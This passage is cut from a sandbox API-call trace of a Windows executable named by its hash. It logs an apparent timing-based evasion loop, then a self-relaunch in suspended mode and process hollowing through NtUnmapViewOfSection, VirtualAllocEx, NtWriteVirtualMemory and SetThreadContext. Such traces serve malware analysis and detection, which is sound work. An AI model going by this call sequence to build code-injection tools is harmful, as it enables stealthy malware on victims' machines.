lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.512] GetTickCount () returned 0x2005009 [0099.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.513] GetTickCount () returned 0x2005009 [0099.513] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.513] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.514] GetTickCount () returned 0x2005009 [0099.514] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.514] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.527] GetTickCount () returned 0x2005019 [0099.528] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.528] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.528] GetTickCount () returned 0x2005019 [0099.528] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.529] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0105.880] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0105.881] GetProcAddress (hModule=0x74650000, lpProcName="GlobalAlloc") returned 0x74669950 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="GetLastError") returned 0x74663870 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="Sleep") returned 0x74667990 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="CreateToolhelp32Snapshot") returned 0x74677b50 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="Module32First") returned 0x746944b0 [0105.883] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0105.883] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xb4 [0105.904] Module32First (hSnapshot=0xb4, lpme=0x19f778) returned 1 [0105.904] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0105.909] LoadLibraryA (lpLibFileName="user32") returned 0x74790000 [0105.909] GetProcAddress (hModule=0x74790000, lpProcName="MessageBoxA") returned 0x7480fec0 [0105.909] GetProcAddress (hModule=0x74790000, lpProcName="GetMessageExtraInfo") returned 0x747c3690 [0105.910] LoadLibraryA (lpLibFileName="kernel32") returned 0x74650000 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="WinExec") returned 0x7468ff70 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileA") returned 0x74676880 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="WriteFile") returned 0x74676ca0 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="CreateProcessA") returned 0x74690750 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="GetThreadContext") returned 0x7466ec60 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAllocEx") returned 0x74692730 [0105.910] GetProcAddress (hModule=0x74650000, lpProcName="VirtualFree") returned 0x74667600 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="ReadProcessMemory") returned 0x74691c80 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="WriteProcessMemory") returned 0x74692850 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadContext") returned 0x74692490 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="ResumeThread") returned 0x7466a800 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="WaitForSingleObject") returned 0x74676820 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleFileNameA") returned 0x7466a720 [0105.916] GetProcAddress (hModule=0x74650000, lpProcName="GetCommandLineA") returned 0x7466ab60 [0105.916] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x778f0000 [0105.917] GetProcAddress (hModule=0x778f0000, lpProcName="NtUnmapViewOfSection") returned 0x77966f40 [0105.917] GetProcAddress (hModule=0x778f0000, lpProcName="NtWriteVirtualMemory") returned 0x77967040 [0105.917] GetProcAddress (hModule=0x74790000, lpProcName="RegisterClassExA") returned 0x747c4e90 [0105.917] GetProcAddress (hModule=0x74790000, lpProcName="CreateWindowExA") returned 0x747c6f30 [0105.917] GetProcAddress (hModule=0x74790000, lpProcName="PostMessageA") returned 0x747bf0e0 [0105.918] GetProcAddress (hModule=0x74790000, lpProcName="GetMessageA") returned 0x747be130 [0105.918] GetProcAddress (hModule=0x74790000, lpProcName="DefWindowProcA") returned 0x7797aed0 [0105.918] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesA") returned 0x74676a20 [0105.918] GetProcAddress (hModule=0x74650000, lpProcName="GetStartupInfoA") returned 0x74669c10 [0105.918] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtectEx") returned 0x74692790 [0105.918] GetProcAddress (hModule=0x74650000, lpProcName="ExitProcess") returned 0x74677b30 [0105.918] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0105.920] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0105.920] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0105.920] RegisterClassExA (param_1=0x19f434) returned 0xc1da [0105.921] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x502d8 [0115.440] PostMessageA (hWnd=0x502d8, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0115.441] GetMessageA (in: lpMsg=0x19f464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f464) returned 1 [0115.441] GetMessageA (in: lpMsg=0x19f464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f464) returned 1 [0115.441] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x3110000 [0115.441] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3110000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe")) returned 0x62 [0115.443] GetStartupInfoA (in: lpStartupInfo=0x19f388 | out: lpStartupInfo=0x19f388*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0115.443] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" " [0115.443] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f388*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x19f3e0 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" ", lpProcessInformation=0x19f3e0*(hProcess=0x118, hThread=0x114, dwProcessId=0x5d8, dwThreadId=0xd10)) returned 1 [0115.490] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.491] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x3110000 [0115.492] GetThreadContext (in: hThread=0x114, lpContext=0x3110000 | out: lpContext=0x3110000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3b1000, Edx=0x0, Ecx=0x0, Eax=0x402738, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.542] ReadProcessMemory (in: hProcess=0x118, lpBaseAddress=0x3b1008, lpBuffer=0x19f3d4, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f3d4*, lpNumberOfBytesRead=0x0) returned 1 [0115.542] NtUnmapViewOfSection (ProcessHandle=0x118, BaseAddress=0x400000) returned 0x0 [0115.542] VirtualAllocEx (hProcess=0x118, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0115.543] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x400000, Buffer=0x30f15a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x30f15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0115.550] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x401000, Buffer=0x30f17a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x30f17a0*, NumberOfBytesWritten=0x0) returned 0x0 [0115.558] WriteProcessMemory (in: hProcess=0x118, lpBaseAddress=0x3b1008, lpBuffer=0x30f1654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x30f1654*, lpNumberOfBytesWritten=0x0) returned 1 [0115.563] SetThreadContext (hThread=0x114, lpContext=0x3110000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3b1000, Edx=0x0, Ecx=0x0, Eax=0x402ee8, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, 